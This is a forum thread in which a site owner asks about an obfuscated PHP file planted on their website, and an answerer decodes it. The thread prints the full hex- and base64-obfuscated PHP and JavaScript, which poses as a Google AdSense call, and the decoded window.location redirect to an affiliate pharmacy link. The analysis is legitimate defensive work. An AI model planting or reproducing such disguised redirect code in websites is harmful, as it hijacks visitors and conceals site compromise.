I found a strange and obscured file "Index.php" at my website. I don't know who placed it at my page, but I would like to understand what it does.
The file has been obscured in the first place by replacing characters with hex values.
<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>
I made a small tool that translated the script back to it's origination.
<?php /* copyright */
${"GLOBALS"}["kgnrwindbn"]="txt";
$egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";
foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
{
${"GLOBALS"}["dxwqoalvaue"]="k";
if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
{
$xfgspywrt="k";
$jdhbwek="txt";
${$jdhbwek} = base64_decode("PFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0KZnVuY3Rpb24gZ2V0bWUoc3RyKQ0KeyB2YXIgaWR4ID0gc3RyLmluZGV4T2YoJz8nKTsgaWYgKGlkeCA9PSAtMSkgcmV0dXJuIHN0cjsgdmFyIGxlbiA9IHN0ci5sZW5ndGg7IHZhciBuZXdfc3RyID0gIiI7IHZhciBpID0gMTsgZm9yICgrK2lkeDsgaWR4IDwgbGVuOyBpZHggKz0gMixpKyspDQp7IHZhciBjaCA9IHBhcnNlSW50KHN0ci5zdWJzdHIoaWR4LCAyKSwgMTYpOyBuZXdfc3RyICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGNoICsgaSkgJSAyNTYpOyB9IA0KZG9jdW1lbnQud3JpdGUobmV3X3N0ci5zdWJzdHIoMCxuZXdfc3RyLmxlbmd0aC0xMSkrIlx1MDAyNlx1MDA2N1x1MDA2Rlx1MDA2Qlx1MDA2Qlx1MDAzRFpaWlpcdTAwMjJcdTAwM0JcdTAwM0NcdTAwMkZcdTAwNzNcdTAwNjNcdTAwNzJcdTAwNjlcdTAwNzBcdTAwNzRcdTAwM0UiKTsNCn0NCmdvb2dsZV9hZF9jbGllbnQgPSAicHViLTE0MzA1ODQ0MDgzMTM4NDMiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNzI4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDkwOw0KZ29vZ2xlX2FkX2Zvcm1hdCA9ICI3Mjh4OTBfYXMiOw0KZ29vZ2xlX2FkX3R5cGUgPSAidGV4dF9pbWFnZSI7DQpnb29nbGVfYWRfY2hhbm5lbCA9ICIiOw0KZ2V0bWUoImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanM/M0I3MTYwNkU2NDZBNkQxODYzNTc2MzVCNjg1MzU4NTUyQzEwNTc0RDYxNEI1QzRCNTk0RjU1NTgwNTIwNTg0OTRENDI0QzUzMDk0NjQ4M0IzODRBM0U0MzQxMEZGMzM4NDM0MjNEMDZGQUY5RkVGNkY4RjZGNkYyRjRGNkY3RUVGMEY1RjFFQjJEMkNFNzI4MUYyNkY0MTUxOTE4RUVFN0RGREZERkQyMUUxRjBCRTVEQURBRDVENUM1RERERENGMTIwMTBGMDUwQjBFRDciKTsNCi8vLS0+IDwvU0NSSVBUPg==");
echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
exit;
}
}
/* copyright */ ?>
But still this wasn't really helpfull, because of the base64 Decoding inside. The Content that has been decoded looks like:
<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); }
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>
And still the Unicode part has also been encoded. This is the result of Decoding the Unicode part.
&gokk=ZZZZ";</script>
Now I know the content, but still can't figure out what it does. (and I don't want to try a script that I don't know).
My guess is that it tries to call google adds in a loop. But would that make sense - because google will block duplicated Ip addresses.
Has anyone seen those scripts at your website too? Or do you have an idea what the script does? Thank you for all suggestions.
After doing a bit of sleuthing, it appears that this script is trying to redirect any hits on wherever index.php
is to a pharmaceutical site of dubious intent. All the Google stuff is a cleverly implemented way to hide a URL redirect in JavaScript.
First, replacing document.write
with console.log
:
function getme(str) {
var idx = str.indexOf('?');
if (idx == -1) return str;
var len = str.length;
var new_str = "";
var i = 1;
for (++idx; idx < len; idx += 2, i++) {
var ch = parseInt(str.substr(idx, 2), 16);
new_str += String.fromCharCode((ch + i) % 256);
}
console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
We get this:
<script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>
re.da.ct.ed
being an IP address. The function getme()
simply parses the slug appended to the Google URL (which is a red herring).
Doing a cURL request for headers on the decoded URL, we get this:
$ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
HTTP/1.1 302 Found
Date: Fri, 27 Jun 2014 21:07:39 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u5
Location: https://www.sleazydrugstore.net
Vary: Accept-Encoding
Content-Type: text/html
Looks like it does nothing more than redirect visitors to a sleazy looking drug store, although there might be something more malicious hidden in there.
I'm not sure whether to post the real URLs and IPs here, so some guidance would be appreciated.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With